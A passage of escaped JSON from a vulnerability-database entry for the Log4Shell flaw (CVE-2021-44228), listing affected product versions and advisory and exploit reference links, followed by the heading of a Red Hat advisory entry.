\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"113C77DA-AC22-4D67-9812-8510EFC0A95F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voic
e_portal:11.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4BE221AB-A3B0-4CFF-9BC0-777773C2EF63\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"15941265-1E7E-4C3E-AF1D-027C5E0D3141\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"54AA2B0C-92A1-4B53-88D7-6E31120F5041\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F9BD7207-85FB-4484-8720-4D11F296AC10\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(1\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"62E009C4-BE3E-4A14-91EF-8F667B2220A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(1\\\\):es01:*:*:*:*:*:*\",\"matchCriteriaId\":\"088512E1-434D-4685-992E-192A98ECAD9A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(1\\\\):es02:*:*:*:*:*:*\",\"matchCriteriaId\":\"50A7BBC6-077C-4182-AA7A-577C4AAC3CD8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(2\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"E0536F45-3A49-4F93-942E-AF679DFC7017\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.000\\\\(000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3D54794B-6CD5-46D7-B9E9-62A642143562\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.000\\\\(001\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BE844DCA-FF52-43F5-BDD9-836A812A8CFF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.002\\\\(000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"07B261EB-CA63-4796-BD15-A6770FD68B34\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.002\\\\(001\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"29F9067A-B86C-4A6B-ACB7-DB125E0
4B795\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\\\(1\\\\):sr7:*:*:*:*:*:*\",\"matchCriteriaId\":\"FAC4CC92-8BA0-4D96-9C48-5E311CDED53F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8F2437A5-217A-4CD1-9B72-A31BDDC81F42\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unity_connection:11.5\\\\(1.10000.6\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9C3CFF0D-BD70-4353-AE2F-6C55F8DE56A2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(1.26\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2CE47760-0E71-4FCA-97D1-CF0BB71CAC17\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(2.26\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"89B2D4F5-CB86-4B25-8C14-CED59E8A3F22\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(3.025\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B150B636-6267-4504-940F-DC37ABEFB082\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(4.018\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D00B9911-A7CA-467E-B7A3-3AF31828D5D9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B67C08C3-412F-4B7F-B98C-EEAEE77CBE4B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6D428C9B-53E1-4D26-BB4D-57FDE02FA613\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CDB41596-FACF-440A-BB6C-8CAD792EC186\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D8C88EE2-5702-4E8B-A144-CB485435FD62\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1BC62844-C608-4DB1-A1AD-C1B5512
8C560\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EFF2FFA4-358A-4F33-BC67-A9EF8A30714E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"53C0BBDE-795E-4754-BB96-4D6D4B5A804F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7A41E377-16F9-423F-8DC2-F6EDD54E1069\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F0C2789E-255B-45D9-9469-B5B549A01F53\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EFAFEC61-2128-4BFA-992D-54742BD4911A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F12AF70E-2201-4F5D-A929-A1A057B74252\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:snowsoftware:snow_commander:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"8.10.0\",\"matchCriteriaId\":\"A2CBCDC4-02DF-47F4-A01C-7CBCB2FF0163\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:snowsoftware:vm_access_proxy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6\",\"matchCriteriaId\":\"C42D44C8-9894-4183-969B-B38FDA1FEDF9\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bentley:synchro:*:*:*:*:pro:*:*:*\",\"versionStartIncluding\":\"6.1\",\"versionEndExcluding\":\"6.4.3.2\",\"matchCriteriaId\":\"8CD3B3D3-CC14-4278-9914-F7C6E86D3119\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bentley:synchro_4d:*:*:*:*:pro:*:*:*\",\"versionEndExcluding\":\"6.2.4.2\",\"matchCriteriaId\":\"0C5D6BF7-A818-4C7D-A305-91EB622271AC\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:percussion:rhythmyx:*:*:*:*:*:*:
*:*\",\"versionEndIncluding\":\"7.3.2\",\"matchCriteriaId\":\"16E0A04D-30BE-4AB3-85A1-13AF614C425C\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"13.3\",\"matchCriteriaId\":\"E0755E91-2F36-4EC3-8727-E8BF0427E663\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB 
Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Dec/2\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Jul/11\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party 
Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Mar/23\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/1\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/2\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/3\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/1\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/2\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/14/4\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/15/3\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party 
Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md\",\"source\":\"security@apache.org\",\"tags\":[\"Broken Link\",\"Product\",\"US Government Resource\"]},{\"url\":\"https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/\",\"source\":\"security@apache.org\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/\",\"source\":\"security@apache.org\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://logging.apache.org/log4j/2.x/security.html\",\"source\":\"security@apache.org\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/\",\"source\":\"security@apache.org\",\"tags\":[\"Patch\",\"Third Party Advisory\",\"Vendor Advisory\"]},{\"url\":\"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20211210-0007/\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT213189\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party 
Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://twitter.com/kurtseifried/status/1469345530182455296\",\"source\":\"security@apache.org\",\"tags\":[\"Broken Link\",\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.debian.org/security/2021/dsa-5020\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/930724\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"security@apache.org\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpujan2022.html\",\"source\":\"security@apache.org\",\"tags\":[\"Patch\",\"Third Party 
Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB 
Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Dec/2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Jul/11\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party 
Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Mar/23\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/3\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/14/4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/15/3\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party 
Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\",\"Product\",\"US Government Resource\"]},{\"url\":\"https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://logging.apache.org/log4j/2.x/security.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\",\"Vendor Advisory\"]},{\"url\":\"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party 
Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20211210-0007/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT213189\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://twitter.com/kurtseifried/status/1469345530182455296\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\",\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.debian.org/security/2021/dsa-5020\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/930724\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party 
Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpujan2022.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]}]}}" } }
rhsa-2021_5140
Vulnerability from csaf_redhat
Notes
